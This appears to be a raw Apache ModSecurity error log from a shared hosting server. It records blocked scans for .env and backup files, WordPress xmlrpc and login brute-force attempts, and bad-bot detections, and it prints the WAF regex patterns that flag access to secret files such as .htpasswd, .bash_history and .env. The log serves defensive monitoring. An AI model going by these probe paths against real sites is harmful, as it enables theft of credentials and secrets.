[Tue May 26 18:35:55.968882 2026] [security2:error] [pid 1015481:tid 1015693] [client 176.65.139.232:18284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.unsobered.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWas7QIKfWDMlp2INc68AAAAVw"]
[Tue May 26 18:35:55.974778 2026] [security2:error] [pid 1015481:tid 1015655] [client 176.65.139.232:18300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.unsobered.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWas7QIKfWDMlp2INc68QAAATY"]
[Tue May 26 18:35:56.031146 2026] [security2:error] [pid 1015481:tid 1015674] [client 176.65.139.229:19576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.unsobered.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWatLQIKfWDMlp2INc6-QAAAUk"]
[Tue May 26 18:35:56.051708 2026] [security2:error] [pid 1015481:tid 1015714] [client 176.65.139.237:62588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.unsobered.com"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWatLQIKfWDMlp2INc6-gAAAXE"]
[Tue May 26 18:35:56.628515 2026] [security2:error] [pid 1015481:tid 1015520] [remote 209.42.20.53:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWatLQIKfWDMlp2INc7AQABRyY"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 18:35:57.451104 2026] [security2:error] [pid 1015481:tid 1015622] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWatbQIKfWDMlp2INc7CgAAARU"]
[Tue May 26 18:35:59.592008 2026] [security2:error] [pid 1015481:tid 1015526] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWat7QIKfWDMlp2INc7NwABGCw"]
[Tue May 26 18:35:59.592159 2026] [security2:error] [pid 1015481:tid 1015625] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWat7QIKfWDMlp2INc7NwABGCw"]
[Tue May 26 18:36:00.156283 2026] [security2:error] [pid 1015481:tid 1015633] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWat7QIKfWDMlp2INc7OwAAASA"]
[Tue May 26 18:36:01.489314 2026] [security2:error] [pid 1015481:tid 1015545] [remote 216.73.216.30:7713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaubQIKfWDMlp2INc7YwABLz8"]
[Tue May 26 18:36:02.039044 2026] [log_config:warn] [pid 1007701:tid 1007856] (32)Broken pipe: [client 106.202.21.168:43094] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 18:36:02.039064 2026] [log_config:warn] [pid 1007701:tid 1007856] (32)Broken pipe: [client 106.202.21.168:43094] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 18:36:03.083427 2026] [security2:error] [pid 1015481:tid 1015643] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaurQIKfWDMlp2INc7dwAAASo"]
[Tue May 26 18:36:04.911508 2026] [security2:error] [pid 1015481:tid 1015705] [client 124.43.5.103:57006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWavLQIKfWDMlp2INc7kgAAAWg"]
[Tue May 26 18:36:04.911680 2026] [security2:error] [pid 1015481:tid 1015705] [client 124.43.5.103:57006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWavLQIKfWDMlp2INc7kgAAAWg"]
[Tue May 26 18:36:05.691573 2026] [security2:error] [pid 1015481:tid 1015614] [client 85.208.96.210:43184] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/list/"] [unique_id "ahWavbQIKfWDMlp2INc7pQAAAQ0"]
[Tue May 26 18:36:05.691744 2026] [security2:error] [pid 1015481:tid 1015614] [client 85.208.96.210:43184] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/list/"] [unique_id "ahWavbQIKfWDMlp2INc7pQAAAQ0"]
[Tue May 26 18:36:05.818827 2026] [security2:error] [pid 1015481:tid 1015674] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWavbQIKfWDMlp2INc7ngAAAUk"]
[Tue May 26 18:36:07.128853 2026] [security2:error] [pid 1015481:tid 1015561] [remote 216.73.216.30:44730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWav7QIKfWDMlp2INc7sgABC08"]
[Tue May 26 18:36:08.453822 2026] [security2:error] [pid 1015481:tid 1015710] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWawLQIKfWDMlp2INc7xAAAAW0"]
[Tue May 26 18:36:09.641658 2026] [security2:error] [pid 1015481:tid 1015618] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWawbQIKfWDMlp2INc73AAAARE"]
[Tue May 26 18:36:10.434945 2026] [security2:error] [pid 1015481:tid 1015558] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWawrQIKfWDMlp2INc75AABN0w"]
[Tue May 26 18:36:10.435155 2026] [security2:error] [pid 1015481:tid 1015656] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWawrQIKfWDMlp2INc75AABN0w"]
[Tue May 26 18:36:10.554530 2026] [log_config:warn] [pid 1007701:tid 1007944] (32)Broken pipe: [client 122.183.57.97:11443] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://www.google.com/
[Tue May 26 18:36:10.554548 2026] [log_config:warn] [pid 1007701:tid 1007944] (32)Broken pipe: [client 122.183.57.97:11443] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://www.google.com/
[Tue May 26 18:36:10.623310 2026] [security2:error] [pid 1015481:tid 1015559] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahWawrQIKfWDMlp2INc78QABUk0"]
[Tue May 26 18:36:11.044273 2026] [security2:error] [pid 1015481:tid 1015690] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWawrQIKfWDMlp2INc7_QAAAVk"]
[Tue May 26 18:36:11.258183 2026] [security2:error] [pid 1015481:tid 1015717] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWawrQIKfWDMlp2INc79wAAAXQ"]
[Tue May 26 18:36:11.426342 2026] [security2:error] [pid 1015481:tid 1015702] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaw7QIKfWDMlp2INc8AAAAAWU"]
[Tue May 26 18:36:11.738081 2026] [security2:error] [pid 1015481:tid 1015726] [client 172.226.44.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWaw7QIKfWDMlp2INc8CQAAAX0"]
[Tue May 26 18:36:11.803246 2026] [security2:error] [pid 1015481:tid 1015631] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaw7QIKfWDMlp2INc8EQAAAR4"]
[Tue May 26 18:36:12.183541 2026] [security2:error] [pid 1015481:tid 1015663] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8GwAAAT4"]
[Tue May 26 18:36:12.426265 2026] [security2:error] [pid 1015481:tid 1015578] [remote 74.7.241.58:40792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWaxLQIKfWDMlp2INc8HAABgmA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes
[Tue May 26 18:36:12.564789 2026] [security2:error] [pid 1015481:tid 1015634] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8HwAAASE"]
[Tue May 26 18:36:12.911601 2026] [security2:error] [pid 1015481:tid 1015729] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8KwAAAYA"]
[Tue May 26 18:36:13.211058 2026] [security2:error] [pid 1015481:tid 1015694] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxbQIKfWDMlp2INc8NwAAAV0"]
[Tue May 26 18:36:13.317158 2026] [security2:error] [pid 1015481:tid 1015645] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8LgAAASw"]
[Tue May 26 18:36:13.551829 2026] [security2:error] [pid 1015481:tid 1015635] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxbQIKfWDMlp2INc8PQAAASI"]
[Tue May 26 18:36:13.875007 2026] [security2:error] [pid 1015481:tid 1015693] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxbQIKfWDMlp2INc8RgAAAVw"]
[Tue May 26 18:36:14.183760 2026] [security2:error] [pid 1015481:tid 1015640] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8MQAAASc"]
[Tue May 26 18:36:14.183791 2026] [security2:error] [pid 1015481:tid 1015640] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaxLQIKfWDMlp2INc8MQAAASc"]
[Tue May 26 18:36:14.197037 2026] [security2:error] [pid 1015481:tid 1015656] [client 65.21.113.244:33534] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWaxLQIKfWDMlp2INc8LwAAATc"]
[Tue May 26 18:36:14.207193 2026] [security2:error] [pid 1015481:tid 1015663] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWaxrQIKfWDMlp2INc8UAAAAT4"]
[Tue May 26 18:36:14.546177 2026] [security2:error] [pid 1015481:tid 1015589] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.backup"] [unique_id "ahWaxrQIKfWDMlp2INc8UgABWms"]
[Tue May 26 18:36:14.552794 2026] [security2:error] [pid 1015481:tid 1015648] [client 74.249.212.138:20815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWaxrQIKfWDMlp2INc8UQAAAS8"]
[Tue May 26 18:36:14.552904 2026] [security2:error] [pid 1015481:tid 1015648] [client 74.249.212.138:20815] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWaxrQIKfWDMlp2INc8UQAAAS8"]
[Tue May 26 18:36:14.948644 2026] [security2:error] [pid 1015481:tid 1015627] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaxrQIKfWDMlp2INc8XgAAARo"]
[Tue May 26 18:36:14.949328 2026] [security2:error] [pid 1015481:tid 1015634] [client 65.21.113.244:33546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWaxrQIKfWDMlp2INc8XAAAASE"]
[Tue May 26 18:36:15.019788 2026] [security2:error] [pid 1015481:tid 1015591] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.old"] [unique_id "ahWax7QIKfWDMlp2INc8XwABG20"]
[Tue May 26 18:36:15.283113 2026] [security2:error] [pid 1015481:tid 1015593] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.bak"] [unique_id "ahWax7QIKfWDMlp2INc8YwABDG8"]
[Tue May 26 18:36:15.530864 2026] [security2:error] [pid 1015481:tid 1015677] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWax7QIKfWDMlp2INc8ZgAAAUw"]
[Tue May 26 18:36:15.530905 2026] [security2:error] [pid 1015481:tid 1015677] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWax7QIKfWDMlp2INc8ZgAAAUw"]
[Tue May 26 18:36:15.531691 2026] [security2:error] [pid 1015481:tid 1015622] [client 65.21.113.244:33556] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWax7QIKfWDMlp2INc8ZAAAARU"]
[Tue May 26 18:36:15.556365 2026] [security2:error] [pid 1015481:tid 1015594] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/.env"] [unique_id "ahWax7QIKfWDMlp2INc8agABOHA"]
[Tue May 26 18:36:15.661716 2026] [security2:error] [pid 1015481:tid 1015683] [client 124.43.5.103:49305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWax7QIKfWDMlp2INc8awAAAVI"]
[Tue May 26 18:36:15.661837 2026] [security2:error] [pid 1015481:tid 1015683] [client 124.43.5.103:49305] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWax7QIKfWDMlp2INc8awAAAVI"]
[Tue May 26 18:36:15.707987 2026] [security2:error] [pid 1015481:tid 1015698] [client 65.21.113.244:33546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWax7QIKfWDMlp2INc8bAAAAWE"]
[Tue May 26 18:36:15.795530 2026] [security2:error] [pid 1015481:tid 1015598] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/app/.env"] [unique_id "ahWax7QIKfWDMlp2INc8cQABKnQ"]
[Tue May 26 18:36:16.035747 2026] [security2:error] [pid 1015481:tid 1015599] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/src/.env"] [unique_id "ahWayLQIKfWDMlp2INc8cwABOXU"]
[Tue May 26 18:36:16.245194 2026] [log_config:warn] [pid 1007701:tid 1007911] (32)Broken pipe: [client 223.237.158.236:54384] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=1
